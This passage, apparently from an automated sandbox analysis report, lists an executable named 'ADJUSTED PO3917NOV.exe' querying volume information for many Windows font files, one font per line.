Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
